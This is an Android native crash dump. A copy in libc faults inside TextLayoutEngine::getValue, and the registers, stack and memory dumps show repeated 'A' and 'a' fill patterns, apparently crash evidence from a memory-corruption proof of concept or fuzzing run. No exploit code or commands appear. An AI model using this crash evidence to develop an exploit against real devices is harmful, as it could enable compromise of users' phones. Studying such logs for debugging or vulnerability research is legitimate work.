I/DEBUG (12909): d2 4100000041000000 d3 4100000041000000
I/DEBUG (12909): d4 4100000041000000 d5 4100000041000000
I/DEBUG (12909): d6 4100000041000000 d7 4100000041000000
I/DEBUG (12909): d8 c3a00000c3a00000 d9 3f80000044340000
I/DEBUG (12909): d10 430500003f800000 d11 3fcdd94742960000
I/DEBUG (12909): d12 4000000000000000 d13 3f0000003f3bb28f
I/DEBUG (12909): d14 000000003f3bb28f d15 0000000000000000
I/DEBUG (12909): d16 0000903cb0e16900 d17 7fffffffffffffff
I/DEBUG (12909): d18 0000000000000000 d19 0000000000000000
I/DEBUG (12909): d20 0000000000000000 d21 397377ce858a5d48
I/DEBUG (12909): d22 3fa555555555554c d23 bcb1a62633145c07
I/DEBUG (12909): d24 3fc55546b2662d7e d25 3fefd70a40000000
I/DEBUG (12909): d26 3fd5555c80ffa191 d27 3fdb6dbfa3a1ea05
I/DEBUG (12909): d28 3fe33338d877fab4 d29 bf747ae000000000
I/DEBUG (12909): d30 3fffeb8500000000 d31 0000000000000000
I/DEBUG (12909): scr 60000010
I/DEBUG (12909):
I/DEBUG (12909): backtrace:
I/DEBUG (12909): #00 pc 0000e210 /system/lib/libc.so
I/DEBUG (12909): #01 pc 001a1a7c <unknown>
I/DEBUG (12909):
I/DEBUG (12909): stack:
I/DEBUG (12909): 5fb77150 5c6a5b14
I/DEBUG (12909): 5fb77154 5c6a5b18
I/DEBUG (12909): 5fb77158 5fb771a4
I/DEBUG (12909): 5fb7715c 401d1885 /system/lib/libandroid_runtime.so (android::TextLayoutEngine::getValue(SkPaint const*, unsigned short const*, int, int, int, int)+104)
I/DEBUG (12909): 5fb77160 00000000
I/DEBUG (12909): 5fb77164 001a1a80
I/DEBUG (12909): 5fb77168 001a1a80
I/DEBUG (12909): 5fb7716c 00000000
I/DEBUG (12909): 5fb77170 601fdbf0
I/DEBUG (12909): 5fb77174 5fb771d8
I/DEBUG (12909): 5fb77178 42375618 /dev/ashmem/dalvik-heap (deleted)
I/DEBUG (12909): 5fb7717c 5c19ea88
I/DEBUG (12909): 5fb77180 00000000
I/DEBUG (12909): 5fb77184 001a1a80
I/DEBUG (12909): 5fb77188 df0027ad
I/DEBUG (12909): 5fb7718c 00000000
I/DEBUG (12909): #00 5fb77190 00000000
I/DEBUG (12909): 5fb77194 001a1a80
I/DEBUG (12909): #01 5fb77198 001a1a80
I/DEBUG (12909): 5fb7719c 00000000
I/DEBUG (12909): 5fb771a0 00000000
I/DEBUG (12909): 5fb771a4 5c6a5af8
I/DEBUG (12909): 5fb771a8 00000000
I/DEBUG (12909): 5fb771ac 5d28ec10
I/DEBUG (12909): 5fb771b0 001a1a80
I/DEBUG (12909): 5fb771b4 00000000
I/DEBUG (12909): 5fb771b8 601fdbe0
I/DEBUG (12909): 5fb771bc 00000000
I/DEBUG (12909): 5fb771c0 001a1a80
I/DEBUG (12909): 5fb771c4 401cd64d /system/lib/libandroid_runtime.so
I/DEBUG (12909): 5fb771c8 001a1a80
I/DEBUG (12909): 5fb771cc 00000000
I/DEBUG (12909): 5fb771d0 5fb771d8
I/DEBUG (12909): 5fb771d4 601fdbf0
I/DEBUG (12909):
I/DEBUG (12909): memory near r0:
I/DEBUG (12909): 5fbfdfb8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdfc8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdfd8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdfe8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdff8 41000000 41000000 00000000 00000000 …A…A……..
I/DEBUG (12909):
I/DEBUG (12909): memory near r1:
I/DEBUG (12909): 6584ae38 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae48 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae58 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae68 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae78 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909):
I/DEBUG (12909): memory near r2:
I/DEBUG (12909): 005ffb60 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffb70 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffb80 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffb90 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffba0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909):
I/DEBUG (12909): memory near r3:
I/DEBUG (12909): 3acb31a0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31b0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31c0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31d0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31e0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909):
I/DEBUG (12909): memory near r4:
I/DEBUG (12909): 601fdbd0 00000000 407d61a8 42375608 bb700005 …..a}@.V7B..p.
I/DEBUG (12909): 601fdbe0 407d64fc 5fb771d8 4013aa4c 5c19ea88 .d}@.q._L..@…\
I/DEBUG (12909): 601fdbf0 00000000 9477d17e bb700005 5d28ec10 ….~.w…p…(]
I/DEBUG (12909): 601fdc00 42375618 bb700005 5c19ea88 00000000 .V7B..p….\….
I/DEBUG (12909): 601fdc10 00000000 001a1a80 00000000 401cd7cf ……………@
I/DEBUG (12909):
I/DEBUG (12909): memory near r5:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d …`……..M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 ………q._…`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909):
I/DEBUG (12909): memory near r6:
I/DEBUG (12909): 5c6a5ad8 00000000 00000000 00000000 00000000 …………….
I/DEBUG (12909): 5c6a5ae8 00000000 00000000 00000000 00000043 …………C…
I/DEBUG (12909): 5c6a5af8 40200e80 5c89c6c0 40200ea0 657c4018 .. @…\.. @.@|e
I/DEBUG (12909): 5c6a5b08 001a1a80 00000007 00000004 4b50d400 …………..PK
I/DEBUG (12909): 5c6a5b18 40200ee8 65e4b018 001a1a80 00000007 .. @…e……..
I/DEBUG (12909):
I/DEBUG (12909): memory near r7:
I/DEBUG (12909): 5c19ea68 00000000 00000040 00000010 00000010 ….@………..
I/DEBUG (12909): 5c19ea78 00040006 001e0103 00000038 00000053 ……..8…S…
I/DEBUG (12909): 5c19ea88 40b36f80 41600000 3f800000 00000000 .o.@..`A…?….
I/DEBUG (12909): 5c19ea98 00000000 00000000 00000000 00000000 …………….
I/DEBUG (12909): 5c19eaa8 00000000 00000000 5c542620 00000000 …….. &T\….
I/DEBUG (12909):
I/DEBUG (12909): memory near r9:
I/DEBUG (12909): 001a1a60 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1a70 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1a80 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1a90 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1aa0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909):
I/DEBUG (12909): memory near fp:
I/DEBUG (12909): 423755f8 40c9fc88 00000000 40cbf9f8 0034351b …@…….@.54.
I/DEBUG (12909): 42375608 40c39928 00000000 001a1a80 00000000 (..@…………
I/DEBUG (12909): 42375618 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375628 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375638 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909):
I/DEBUG (12909): memory near ip:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d …`……..M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 ………q._…`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909):
I/DEBUG (12909): memory near sp:
I/DEBUG (12909): 5fb77170 601fdbf0 5fb771d8 42375618 5c19ea88 …`.q._.V7B…\
I/DEBUG (12909): 5fb77180 00000000 001a1a80 df0027ad 00000000 ………’……
I/DEBUG (12909): 5fb77190 00000000 001a1a80 001a1a80 00000000 …………….
I/DEBUG (12909): 5fb771a0 00000000 5c6a5af8 00000000 5d28ec10 …..Zj\……(]
I/DEBUG (12909): 5fb771b0 001a1a80 00000000 601fdbe0 00000000 ………..`….
I/DEBUG (12909):
I/DEBUG (12909): code around pc:
I/DEBUG (12909): 400f81f0 f5d1f020 ba000007 f5d1f040 f5d1f060 …….@…`…
I/DEBUG (12909): 400f8200 ecb10b10 f5d1f040 f5d1f060 e2522040 ….@…`…@ R.
I/DEBUG (12909): 400f8210 eca00b10 aafffff9 e2922040 0a00000f ……..@ ……
I/DEBUG (12909): 400f8220 e3520008 ba000004 ecb10b02 e2422008 ..R………. B.
I/DEBUG (12909): 400f8230 e3520008 eca00b02 aafffffa e3120004 ..R………….
I/DEBUG (12909):
I/DEBUG (12909): code around lr:
I/DEBUG (12909): 401d05f0 46339303 980e4601 a8059002 f90ef001 ..3F.F……….
I/DEBUG (12909): 401d0600 b14e9e05 6932b12d 68f14628 f7c60092 ..N.-.2i(F.h….
I/DEBUG (12909): 401d0610 b10cea36 602169f1 f7d8a805 b007fb89 6….i!`……..
I/DEBUG (12909): 401d0620 83f0e8bd b087b5f0 460d4616 4604461f ………F.F.F.F
I/DEBUG (12909): 401d0630 ff2af7e8 46222300 0048e88d 9602462b ..*..#”F..H.+F..
I/DEBUG (12909):
I/DEBUG (12909): memory map around fault addr 5fbfe000:
I/DEBUG (12909): 5faff000-5fbfe000
I/DEBUG (12909): 5fbfe000-5fbff000
I/DEBUG (12909): 5fbff000-5fcfe000